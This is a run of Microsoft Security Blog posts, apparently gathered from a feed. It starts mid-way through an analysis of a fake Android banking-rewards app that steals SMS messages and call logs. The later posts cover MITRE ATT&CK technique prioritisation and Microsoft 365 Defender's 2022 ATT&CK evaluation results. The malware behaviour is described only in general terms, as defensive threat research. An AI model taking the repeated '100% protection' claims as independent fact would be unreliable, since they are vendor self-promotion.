The malware steals all SMS messages from the mobile device’s inbox. It collects all received, sent, read, and even unread messages. Collecting all SMS messages might allow attackers to use the data to expand their stealing range, especially if any messages contain other sensitive information such as SMS-based 2FA for email accounts, one’s personal identification like the Aadhar card commonly used in India, or other financial-related information.

Uploading all call logs

The malware also uploads call logs stored on the mobile device. This data may be used for the attacker’s surveillance purposes.

Communicating with its C2

This malware uses the open-source library socket.io to communicate with its C2 server.

RestartBroadCastReceiver

The malware also uses the Android component RestartBroadcastReceiver, which functions based on the type of events received by the mobile device. This receiver launches a job scheduler named JobService, which eventually calls AutoStartService in the background. The receiver reacts when the device is restarted, if the device is connected to or disconnected from charging, when the device’s battery status changes, and changes in the device’s Wi-Fi state.  RestartBroadcastReceiver ensures that the main command handler AutoStartService is always up and running.

Mitigating the fake app’s unwanted extras

This malware’s continuing evolution highlights the need to protect mobile devices. Its wider SMS stealing capabilities might allow attackers to the stolen data to further steal from a user’s other banking apps. Its ability to intercept one-time passwords (OTPs) sent over SMS thwarts the protections provided by banks’ two-factor authentication mechanisms, which users and institutions rely on to keep their transactions safe. Its use of various banking and financial organizations’ logos could also attract more targets in the future.

App installation on Android is relatively easy due to the operating system’s open nature. However, this openness is often abused by attackers for their gain. Apart from exercising utmost care when clicking on links in messages and installing apps, we recommend that users follow these steps to protect their devices from fake apps and malware:

• Download and install applications only from official app stores.
• Android device users can keep the Unknown sources option disabled to stop app installation from unknown sources.
• Use mobile solutions such as Microsoft Defender for Endpoint on Android to detect malicious applications.

Appendix

Indicators of compromise

MITRE ATT&CK techniques

Shivang Desai, Abhishek Pustakala, and Harshita Tripathi
Microsoft 365 Defender Research Team

The post Rewards plus: Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices appeared first on Microsoft Security Blog.

The ATT&CK framework provides an extensive list of specific techniques that may be challenging to navigate in certain situations. This project aims to help defenders who use the framework focus on noteworthy techniques regardless of the attack scenario or environment. For example, using research on 22 ransomware attacks, the repeatable methodology led to the identification of the top 10 ransomware techniques list.

The project also included the development of a customizable, web-based calculator that seeks to prioritize techniques based on a defender’s input, making the methodology even easier to apply to different environments and scenarios. As an example of the insights that can be gained from using this calculator, the project found that the following techniques are present in most attacks and environments:

• Command & Scripting Interpreter (T1059)
• Scheduled Task/Job (T1053)
• Impair Defenses (T1562)
• Remote Services (T1021)
• Create or Modify System Process (T1543)

This methodology considers the continuing evolution of threats, so it supports the creation of criteria that are tailored to an organization’s unique environment. This enables defenders to continuously identify threat trends and decide where to focus resources for detection coverage.

Establishing the top ATT&CK techniques

The methodology for identifying the top ATT&CK techniques factored in three attributes to determine the significance of a technique: prevalence, choke point, and actionability.

Prevalence is the frequency of specific ATT&CK techniques used by attackers over time. A higher frequency of a technique indicates a higher likelihood of it being used in multiple attack scenarios. Therefore, there’s a higher chance of encountering an attack with a high prevalence ranking. Prevalence was determined using the Center’s Sightings Ecosystem project from April 2019 to July 2021, which registered 1.1 million encounters of attacks across the 184 unique ATT&CK techniques. Including prevalence as a criterion aims to cover more attacks with fewer techniques.

Choke points are techniques that disrupt an attacker due to them being a point of convergence or divergence. In real-world incidents, choke points manifest as one-to-many or many-to-one behaviors or steps in the attack. The inclusion of this criterion aims to identify the critical techniques that can help link activity throughout attack chains.

Actionability is the opportunity for a defender to detect or mitigate a technique. This is based on publicly available security controls (such as CIS Critical Security Controls and NIST 800-53 Security Controls) and analytics (Splunk detections, Elastic, and Sigma).

Top 10 techniques in ransomware attacks

Following the creation of the methodology, the top 10 ransomware techniques list was generated to test this new approach in practice. To create this list, Microsoft and the other partners involved in this collaborative effort analyzed prevalent ransomware attacks from the past three years. A total of 22 specific ransomware attacks were studied specifically for their use of ATT&CK techniques. Based on this research, the top 10 techniques in ransomware attacks are:

• Data Encrypted for Impact (T1486)
• Inhibit System Recovery (T1490)
• Obfuscated Files or Information (T1027)
• Windows Management Instrumentation (T1047)
• Masquerading (T1036)
• Command and Scripting Interpreter (T1059)
• Impair Defenses (T1562)
• Modify Registry (T1112)
• User Execution (T1204)
• Process Injection (T1055)

Organization-specific top techniques list via web calculator

This collaborative project also included the creation of a dynamic, user-friendly calculator for a more customizable, tailored top techniques list. This customizability allows organizations to have unique prioritization based on each organization’s size and maturity.

The calculator takes into consideration various inputs, including:

• NIST 800-53 Controls (all NIST controls or specific ones such as AC-2, CA-2, etc.)
• CIS Security Controls (all CIS Controls or specific ones such as 1.1, 2.5, etc.)
• Detection analytics (MITRE Cyber Analytics Repository, Elastic, Sigma, Splunk)
• Operating systems used in the environment
• Monitoring capabilities for network, process, file, and cloud services in the network

With this calculator, an organization can create a tailored technique list based on various aspects like the maturity of their security operations and the tools that they use. This can serve as a great starting point for companies looking to evaluate and improve their detection and protection capabilities regarding ransomware activities and prioritize the TTPs that are the most actionable for them.

Practical applications and future work

The methodology and insights from the top techniques list has many practical applications, including helping prioritize activities during triage. As it’s applied to more real-world scenarios, we can identify areas of focus and continue to improve our coverage on these TTPs and behaviors of prevalent threat actors. Refining the criteria can further increase results accuracy and make this project more customer-focused and more relevant for their immediate action. Improvements in the following areas can be of particular benefit:

• Fine-tuning the choke point analysis by adding machine learning models to visualize and predict all viable paths an attacker could take, which can be used to create a corresponding attack graph. This attack graph could be tied in with the user-implemented filters to identify relevant paths based on an organization’s current functionality. Future integration with the Attack Flow project might be a step towards this enhanced choke point analysis.
• Developing a metric to identify subjective filters like “Damage Impact” and “Significance” as they are important when making decisions on covering different attacks.
• Performing a comparison of results between this current analysis and global data sets to validate the accuracy of the current findings.
• Enhancing prevalence data to ensure a broad and timely data set is driving the analysis. Community contributions to the Sightings Ecosystem project is critical.

Insights from industry-wide collaborations like this project help enrich the protection that Microsoft provides for customers through solutions like Microsoft 365 Defender and Microsoft Sentinel. These solutions are further informed by trillions of signals that Microsoft processes every day, as well as our expert monitoring of the threat landscape. For example, our comprehensive view and research into the ransomware ecosystem enables us to deliver cross-domain defense against human-operated ransomware, leveraging a Zero Trust approach to limit the attack surface and minimize the chances of ransomware attacks succeeding. 

In the recent MITRE Engenuity ATT&CK® 2022 Evaluations, Microsoft demonstrated complete visibility and analytics on all stages of the attack chain, with 100% protection coverage, blocking all stages in early steps (pre-ransomware phase), including techniques within the top 10 ransomware techniques list that were tested.

This collaboration and innovation benefits everyone in the security community, not only those who use the MITRE ATT&CK framework as part of their products and services, but also our valued ecosystem of partners who build services on top of our platform to meet the unique needs of every organization, to advance threat-informed defense in the public interest. Microsoft is a research sponsor at the Center for Threat-Informed Defense, partnering to advance the state of the art in threat-informed defense in the public interest. One of our core principles at Microsoft is security for all, and we will continue to partner with MITRE and the broader community to collaborate on projects like this and share insights and intelligence.

Gierael Ortega, Alin Nagraj, Devin Parikh
Microsoft 365 Defender Research Team

The post Center for Threat-Informed Defense, Microsoft, and industry partners streamline MITRE ATT&CK® matrix evaluation for defenders appeared first on Microsoft Security Blog.

• Complete visibility and analytics to all stages of the attack chain
• 100% protection, blocking all stages in early steps
• Each attack generated a single comprehensive incident for the SOC
• Differentiated XDR capabilities with integrated identity protection
• Protection for Linux across all attack stages
• Deep and integrated Windows device sensors
• Leading with product truth and a customer-centric approach

Microsoft 365 Defender XDR solution displayed top-class coverage by successfully surfacing to the security operations center (SOC) a single comprehensive incident per each of the simulated attacks. This comprehensive view provided in each incident detailed suspicious device and identity activities coupled with unparalleled coverage of adversary techniques across the entire attack chain. Microsoft 365 Defender also demonstrated 100% protection by blocking both attacks in the early stages.

This is the third year in which Microsoft 365 Defender showcases the power of the combined XDR suite, demonstrating coverage across devices, identities, and cloud applications.

Demonstrated complete visibility and analytics across all stages of the attack chain

Microsoft 365 Defender demonstrated complete technique-level coverage across all the attack stages of Wizard Spider and Sandworm, leveraging our artificial intelligence-driven adaptive protection.

Defending against human-operated ransomware requires a defense in-depth approach that continuously evaluates device, user, network, and organization risk and then leverages these signals to alert on potential threats across the entire attack chain. Providing detection and visibility enables defenders to evict the attackers from the network during the pre-ransom phase. It also minimizes the impact of encryption or extortion through data exfiltration activities.

Technique-level detection coverage in real time without delays

Human-operated ransomware attacks evolve within minutes, and the time it takes for defenders to respond and prevent attackers from performing destructive actions—such as encrypting devices or exfiltrating information for extortion—is crucial. Organizations need real-time detections with no delays to ensure they can rapidly evict attackers before they have a chance to continue to move laterally through the infrastructure. Microsoft 365 Defender provided technique-level coverage at every attack stage in real time without any delayed detections.

100% protection coverage, blocking all stages in early steps

Microsoft 365 Defender provided superior coverage and blocked 100% of the attack stages, offering excellent coverage across Windows and Linux platforms. Moreover, its next-generation protection capabilities proceeded without hindering productivity by blocking benign activities or a need for user consent.  

In real-world scenarios, blocking ransomware activities early—that is, in the pre-ransom stage across all platforms and assets—is crucial in protecting customers and mitigating the downstream extortion and disruption attack impact.

Each attack generated a single comprehensive incident for the SOC

Unlike many other vendors surfacing multiple alerts and multiple incidents, Microsoft 365 Defender surfaced exactly one incident per attack, combining all events across device and identity into a single comprehensive view of each attack.

Microsoft 365 Defender’s unique incident correlation technology is tremendously valuable for SOC analysts in dealing with alert fatigue. It significantly improves the efficiency in responding to threats, saving time they might have otherwise spent in manual correlations or dealing with individual alerts. It also makes triage and investigation easier and faster with a view of the full attack graph.  

Unique and durable detections from the integrated Microsoft Defender for Identity

Microsoft 365 Defender’s integrated identity protection capabilities uncover and durably block identity-related attacks regardless of the specific attacker technique implemented on a device, making it practically impossible for attackers to evade. Furthermore, building these protections in the identity fabric provides in-depth, context-rich signals for security teams to investigate and respond effectively. Other vendors leveraging endpoint-only signals may be more susceptible to evasion, and their detections typically have less context.

Here are some examples representing Microsoft 365 Defender’s unique identity protection capabilities in the evaluation:

• Step 5.A.4 – query to a security account manager (SAM) database was uncovered using Active Directory signals with detailed context on user enumeration activity. This identity-based detection approach prevents attacker evasion and provides rich investigation context for security teams. Some other vendors in the test relied on process creation telemetry to get similar visibility but lacked context and could be easily bypassed.

• Step 6.A.2 – resource-access activity on a domain controller was also uncovered using our identity sensors, with details of the exposed service principal name (SPN) and the compromised related resource name. Here too, this approach provides similar detection durability and investigation details advantages.

Protection for Linux across all attack stages

Microsoft 365 Defender continues to demonstrate excellent protection coverage on all platforms, with top-level coverage on Windows and Linux. It covered all Linux-related stages via technique-level analytics, context-rich alerts, and in-depth investigation signals.

Customers face threats from various entry points across devices, and device discovery and lateral movement to identify high-value assets are table stakes for advanced attacks like human-operated ransomware. Therefore, having excellent coverage across all platforms is crucial to protect organizations against attacks.

For example, as seen in Figure 10 below, Microsoft Defender for Endpoint on a Linux device alerted of suspicious behavior by a web server process. The alert allowed for blocking sensitive file read and preventing further file read. The attacker then attempted to download and run a backdoor on the device. However, that was also blocked behaviorally, thus preventing subsequent compromise.

Unique and durable detections from Windows deep native sensors  

While most attack steps on devices could be observed by inspecting process and script activities, solely relying on this type of telemetry can be challenging in several aspects.

From a detection durability standpoint, attackers could easily avoid detection by obfuscating or pivoting to alternative methods. Furthermore, in terms of detection quality, relying solely on “surface-level” telemetry could potentially produce a higher number of false positives and overhead for security teams. Finally, this type of telemetry lacks the needed context to enable effective investigation and response.

Unlike other solutions, Microsoft 365 Defender’s unique platform-native deep device sensors introduced signal depth, providing durable, context-rich signals for security teams to identify, investigate and respond to. Here are some examples, as seen during the evaluation:

• Steps 1.A.6 and 19.A.11 were uncovered via enhanced Windows Management Instrumentation (WMI) sensors, providing visibility to evasive attacker activities without relying on a process or script execution telemetry.

• Step 3.A.4 was uncovered via COM sensors, providing visibility to the Microsoft Outlook COM interface and detecting an attacker’s search for unsecured passwords in Outlook without relying on process command lines that attackers can easily evade by using COM interfaces directly.

• Step 17.A.2 was uncovered via Data Protection API (DPAPI) sensors, providing visibility to credential access—an extremely important activity. Other solutions monitor web browser folders for file access which is extremely prone to false positives in real-world environments.

A final word: Leading with product truth and a customer-centric approach

As in previous years, Microsoft’s philosophy in this evaluation was to empathize with our customers—the “protection that works for customers in the real world” approach. We participated in the evaluation with product capabilities and configurations that we expect customers to use.

As you review evaluation results, you should consider additional important aspects, including depth and durability of protection, completeness of signals and actionable insights, and quality aspects such as device performance impact and false-positive rates. All of these are critical to the solution’s reliable operation and translate directly to protection that works in real customer production environments.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

The post Microsoft 365 Defender demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations appeared first on Microsoft Security Blog.

The ever-evolving threat landscape continues to deliver adversaries with new techniques, revamped tactics, and more advanced attack capabilities. Such threats demand comprehensive security solutions that provide a holistic view of the attack across endpoints and domains, prevent and block attacks at all stages, and provide security operations (SecOps) with automated tools to remediate complex threats and attackers in the network.

This year’s ATT&CK Evaluations concentrated on advanced threat actors Wizard Spider and Sandworm. These actors are known for deploying sophisticated human-operated ransomware campaigns designed to destabilize infrastructure and institutions. The testing included detection benchmarks and protection simulations across platforms, such as Windows and Linux, of more than 100 steps and 66 unique ATT&CK techniques across the attack chain.  

We’re proud to report that Microsoft 365 Defender successfully detected and prevented malicious activity at every major attack stage, demonstrating comprehensive technique-level coverage across endpoints and identities. Rich threat intelligence synthesized from trillions of security signals on a daily basis proved key to informing both controls to be implemented in a Zero Trust approach and threat hunting. 

MITRE Engenuity’s ATT&CK Evaluations results emphasized that Microsoft’s success in this simulation was largely due to our:

• Industry-leading XDR. Microsoft 365 Defender simplified thousands of alerts into two incidents and a clear timeline spanning identity and endpoint to enable rapid resolution.
• Superior EPP and EDR. Microsoft Defender for Endpoint both prevented attacks and quickly identified and contained suspicious activities in the pre- and post-ransom phases to stop attacks.
• Comprehensive multi-platform protection. Microsoft 365 Defender demonstrated maturity in protecting multi-platform environments. In addition to Windows, Microsoft Defender for Endpoint’s behavioral and machine learning models blocked and detected every major step on Linux for the second year in a row.

Microsoft defends against human-operated ransomware with industry-leading XDR

One of the most prominent dangers in today’s threat landscape are human-operated ransomware campaigns, which leverage the playbook of advanced nation-state actors, where a threat actor actively targets one or more organizations using custom-built techniques for the target network. These campaigns also often involve encryption and exfiltration of high-value data, making it critical for security solutions to address the threat quickly and aggressively. If successful, human-operated ransomware attacks can cause catastrophic and visible disruption to organizations, their customers, and the rest of their communities. Protecting against these attacks requires a holistic security strategy that can resist a persistent attacker, including the ability to isolate and contain the threat to prevent widespread damage.

As demonstrated in the evaluation, Microsoft 365 Defender protected against these sophisticated attacks with:

• Prevention at the earliest stages of the attack to stop further attacker activity without hindering productivity
• Diverse signal capture from devices and identities, with device-to-identity and identity-to-device signal correlation
• Coverage across device assets, including Windows, Linux, Mac, iOS, and Android
• Excellent pre-ransom and ransom protection for both automated remediation of the persistent threats and complete eviction of the attacker in network

Integrated identity threat protection proves critical

With human-operated ransomware, threat actors are constantly advancing their techniques. This year’s test included domain trust discovery activity, pass-the-hash, pass-the-ticket, and stealing credentials through Kerberoasting. Microsoft supports billions of identity authentications per day, and Microsoft 365 Defender has deep integration with both on-premises and cloud identities, thus enabling a level of detection and visibility that far exceeds what is possible with endpoint data alone and by fusing endpoint and identity data. Microsoft 365 Defender protects hundreds of millions of customer identities today, and the integration of identity threats into the events timeline was instrumental in detections during evaluation.

Aggregating alerts into prioritized incidents streamlined the investigation experience

Microsoft 365 Defender streamlined the investigation experience by correlating more than a thousand alerts into significant incidents and identified complex, seemingly unrelated links between attacker activities across various domains. Time to remediate is critical in a ransomware attack, and Microsoft 365 Defender’s incidents page simplifies the SecOps experience by providing essential context on active alerts, key devices, and impacted users. It also allows defenders to enable both automatic and manual remediations that offer insightful and actionable alerts, rather than filtering through unrelated events that can add strain on resources, particularly during an existing attack. EDR further enables analysts to approach investigations through multiple vectors, providing detailed behavioral telemetry that includes process information, network activities, kernel and memory manager deep optics, registry and file system changes, and user login activities to determine the start and scale of an attack.

Microsoft 365 Defender delivers mature multi-platform protection

The attack scenario mimicked a threat actor’s ability to target heterogeneous environments and spread across platform ecosystems. We’re proud to state that Microsoft 365 Defender’s security capabilities provided superior detection and protection and complete Linux coverage for the second consecutive year.

Microsoft 365 Defender offers comprehensive capabilities across the popular desktop and mobile operating systems, such as Linux, Mac, Windows, iOS, and Android. These capabilities include next-generation antivirus, EDR, and behavioral and heuristic coverage across numerous versions of Linux. Microsoft has invested heavily in protecting non-Windows platforms in the last four years and, today, offers the extensive capabilities organizations need to protect their networks. 

Microsoft takes a customer-centered approach to tests

The evolving threat landscape demands security solutions with wide-ranging capabilities, and we’re dedicated to helping defenders combat such threats through our industry-leading, cross-domain Microsoft Defender products. Microsoft’s philosophy in this evaluation is to empathize with our customers, so we configured the product as we would expect them to. For example, we didn’t perform any real-time detection tuning that might have increased the product’s sensitivity to find more signals, as it would have further created an untenable number of false positives if in a real-world customer environment.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

Learn more

For more information about human-operated ransomware and how to protect your organization from it, refer to the following articles:

• Human-operated ransomware
• Rapidly protect against ransomware and extortion

Take advantage of Microsoft’s unrivaled threat optics and proven capabilities. Learn more about Microsoft 365 Defender or Microsoft Defender for Endpoint, and sign up for a trial today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft protects against human-operated ransomware across the full attack chain in the 2022 MITRE Engenuity ATT&CK® Evaluations appeared first on Microsoft Security Blog.